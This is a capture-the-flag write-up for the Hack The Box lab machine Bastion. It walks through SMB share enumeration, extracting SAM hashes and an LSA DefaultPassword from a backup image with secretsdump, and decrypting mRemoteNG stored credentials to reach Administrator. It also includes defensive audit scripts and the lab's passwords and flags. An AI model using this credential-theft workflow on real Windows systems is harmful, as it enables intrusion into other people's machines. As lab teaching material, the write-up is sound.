Writeup: Hack The Box - Machines - Bastion

Description

  • Name: Bastion
  • IP: 10.10.10.134
  • Author: L4mpje
  • Difficulty: ?/10

Discovery

nmap -sC -sV -Pn -p- -T5 --min-rate 1000 --max-retries 5 10.10.10.134

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-18 23:39 CEST
Nmap scan report for 10.10.10.134
Host is up (0.027s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -38m22s, deviation: 1h09m16s, median: 1m36s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-06-18T23:42:14+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-18 23:42:17
|_ start_date: 2019-06-18 23:22:10

From the output we can notice that the server is a Windows Server 2016 host exposing SMB on port 445 (alongside OpenSSH for Windows on 22 and WinRM on 5985).

Pwn user

To list all the shares we can use the command smbclient -L 10.10.10.134, pressing Enter at the password prompt (an empty password, i.e. a null session), which outputs:

Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
Enter WORKGROUP\s41m0n's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Now we can try to access them (or mount the share: mount -t cifs //10.10.10.134/Backups mountedBackup), finding that we can only access Backups and IPC$. Exploring the first one, we're led to the folder WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351, which contains a bunch of XML files plus two .vhd images.

By definition:

VHD (Virtual Hard Disk) is a file format which represents a virtual hard disk drive (HDD). It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders. It is typically used as the hard disk of a virtual machine.

By using the command virt-list-filesystems mountedBackup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd provided by libguestfs, it is possible to list the partitions inside each virtual hard disk (in our case both contain a single /dev/sda1).

Mount those vhd in a temporary local directory: guestmount --add mountedBackup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --ro ~/Desktop/mntpt1 -m /dev/sda1 (and the same for the second .vhd, with a second mount point).

While the first one does not contain useful data, the second one is far more interesting: we can explore its Windows directory looking for the SAM file, which holds the local account password hashes. Those hashes are encrypted with the boot key kept in the SYSTEM hive, so together with the SECURITY and SYSTEM files the SAM can be decrypted offline and the hashes recovered.

Once those files are retrieved, we can use secretsdump.py, a script supplied by impacket, to dump the hashes and LSA secrets from them:

$ python examples/secretsdump.py -sam ~/Desktop/SAM -security ~/Desktop/SECURITY -system ~/Desktop/SYSTEM LOCAL

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd

The password for user L4mpje is bureaulampje, exposed in clear by the DefaultPassword LSA secret (the automatic-logon password)!
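As an added illustration (my own code, not part of the original writeup and not impacket's), here is a small audit of the secretsdump output above: it parses the user:RID:LM:NT::: lines, flags accounts whose NT hash is the empty-password hash or whose LM hash is still populated, and checks each NT hash against a short, constructed list of weak candidates. The NT hash is MD4 over the UTF-16LE encoding of the password, implemented here in pure Python because hashlib's md4 is often missing on OpenSSL 3 builds. The dump lines are the ones shown above; the candidate list is constructed.

```python
import re
import struct
from typing import Dict, List

# Pure-Python MD4 (RFC 1320). Windows NT hashes are MD4 over the UTF-16LE
# password, and hashlib.new("md4") is frequently unavailable on OpenSSL 3.
def md4(data: bytes) -> bytes:
    M = 0xFFFFFFFF

    def rotl(x: int, s: int) -> int:
        return ((x << s) | (x >> (32 - s))) & M

    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z

    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)                      # padding: 1 bit, zeros, 64-bit length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = list(struct.unpack("<16I", msg[off:off + 64]))
        v = h[:]

        def step(f, k, x, s, i):
            t = (-i) % 4                  # rotates through a, d, c, b
            v[t] = rotl((v[t] + f(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]) + x + k) & M, s)

        for i in range(16):
            step(F, 0, X[i], (3, 7, 11, 19)[i % 4], i)
        for i, j in enumerate((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)):
            step(G, 0x5A827999, X[j], (3, 5, 9, 13)[i % 4], i)
        for i, j in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):
            step(H, 0x6ED9EBA1, X[j], (3, 9, 11, 15)[i % 4], i)
        h = [(h[n] + v[n]) & M for n in range(4)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16le")).hex()


NULL_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
SAM_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)


def audit_sam_dump(dump: str, candidates: List[str]) -> Dict[str, List[str]]:
    """Map each account in secretsdump-style output to a list of findings."""
    lookup = {nt_hash(p): p for p in candidates}
    report: Dict[str, List[str]] = {}
    for line in dump.splitlines():
        m = SAM_LINE.match(line.strip())
        if not m:
            continue                      # skip the [*] status lines and LSA secrets
        user, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).lower(), m.group(4).lower()
        findings = []
        if nt == EMPTY_NT:
            findings.append("empty NT hash: no password set (or account disabled); confirm it is disabled")
        if lm != NULL_LM:
            findings.append("LM hash present: LM storage still enabled, trivially crackable")
        if nt in lookup:
            findings.append(f"NT hash matches weak candidate '{lookup[nt]}'")
        if rid == 500 and nt != EMPTY_NT:
            findings.append("built-in Administrator password hash is exposed in an offline backup")
        report[user] = findings
    return report


# Account lines from the secretsdump output in the writeup.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping LSA Secrets
"""
# Constructed candidate list (the kind of short, targeted list a backup audit uses).
CANDIDATES = ["Password1", "Welcome123", "bureaulampje", "bastion"]

if __name__ == "__main__":
    for user, findings in audit_sam_dump(SAMPLE_DUMP, CANDIDATES).items():
        print(user, "->", findings or ["no finding"])
```

This is the check a defender runs on a backup image before it lands on a readable share: any hash that falls to a short list, or a stored DefaultPassword next to it, means the share itself is the exposure, regardless of how strong the live host's configuration is.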

ssh L4mpje@10.10.10.134
# enter bureaulampje at the password prompt (ssh's -p option selects the port, not the password)
l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt
9bfe57d5c3309db3a151772f9d86c6cd

And that is the user flag :)

Pwn root

For the root part we have to find a vulnerable service or program. By searching through the directories, we notice that the mRemoteNG application is installed. This is a remote-connection manager that stores the credentials of saved connections; older versions protect them with a hardcoded default master password, so anyone who can read the configuration file can decrypt them. In our case it stores its data in C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml, and by opening that XML file it is possible to see the stored passwords (reversibly encrypted, not hashed).

Decrypting them using that weakness is quite easy; we can use for example mremoteng-decrypt:

$ python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

Now we have the password for Administrator!
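Added example (my own code, not the writeup's and not mRemoteNG's): before deciding whether a leaked confCons.xml matters, a defender wants to know what it holds. The script below parses a constructed confCons.xml modelled on the layout mRemoteNG writes (a root Connections element carrying EncryptionEngine, BlockCipherMode, KdfIterations and FullFileEncryption attributes, and Node children with Username, Password and Hostname attributes); the attribute names are assumptions from that format, the hostnames and the second connection are placeholders, and the Password value on the DC node is the ciphertext quoted above. It inventories every saved connection that carries a stored password and reports the cipher settings, without decrypting anything.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample modelled on an mRemoteNG confCons.xml. Attribute names are
# assumptions about the format; hostnames are placeholders; the Password on the
# "DC" node is the ciphertext from the writeup.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" ConfVersion="2.5">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
        Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
        Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
  <Node Name="placeholder-host" Type="Connection" Username="L4mpje" Domain=""
        Password="" Hostname="192.0.2.10" Protocol="RDP" Port="3389" />
</mrng:Connections>
"""

SETTING_KEYS = ("EncryptionEngine", "BlockCipherMode", "KdfIterations", "FullFileEncryption")


def _local_name(tag: str) -> str:
    """Strip an XML namespace prefix such as {http://mremoteng.org}."""
    return tag.split("}")[-1]


def inventory_mremoteng(xml_text: str) -> Dict[str, object]:
    """Summarise what a confCons.xml exposes: cipher settings, saved
    connections, and which of them carry a stored (encrypted) password."""
    root = ET.fromstring(xml_text)
    settings = {k: root.attrib.get(k) for k in SETTING_KEYS}

    entries: List[Dict[str, object]] = []
    for node in root.iter():
        if _local_name(node.tag) != "Node":
            continue
        entries.append({
            "name": node.get("Name"),
            "host": node.get("Hostname"),
            "user": node.get("Username"),
            "has_password": bool(node.get("Password")),
        })

    findings: List[str] = []
    if settings["FullFileEncryption"] != "true":
        findings.append("connection names, hosts and usernames are readable in clear")
    stored = [e for e in entries if e["has_password"]]
    if stored:
        who = ", ".join(f"{e['user']}@{e['host']}" for e in stored)
        findings.append(
            f"{len(stored)} connection(s) store a password ({who}); anyone holding the "
            "file can recover them if the master password was left at its default"
        )
    return {"settings": settings, "entries": entries, "findings": findings}


if __name__ == "__main__":
    result = inventory_mremoteng(SAMPLE_CONFCONS)
    print("cipher settings:", result["settings"])
    for finding in result["findings"]:
        print("-", finding)
```

The two findings together are the risk statement for the host: the file is readable by the user account that was already compromised, and the only thing standing between a reader and the Administrator credential is a master password that the user never changed.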

$ ssh Administrator@10.10.10.134
# enter thXLHM96BeKL0ER2 at the password prompt (ssh's -p option selects the port, not the password)
administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
958850b91811676ed6620a9c430e65c8

We got the root flag.

Vulnerability description link: cosine security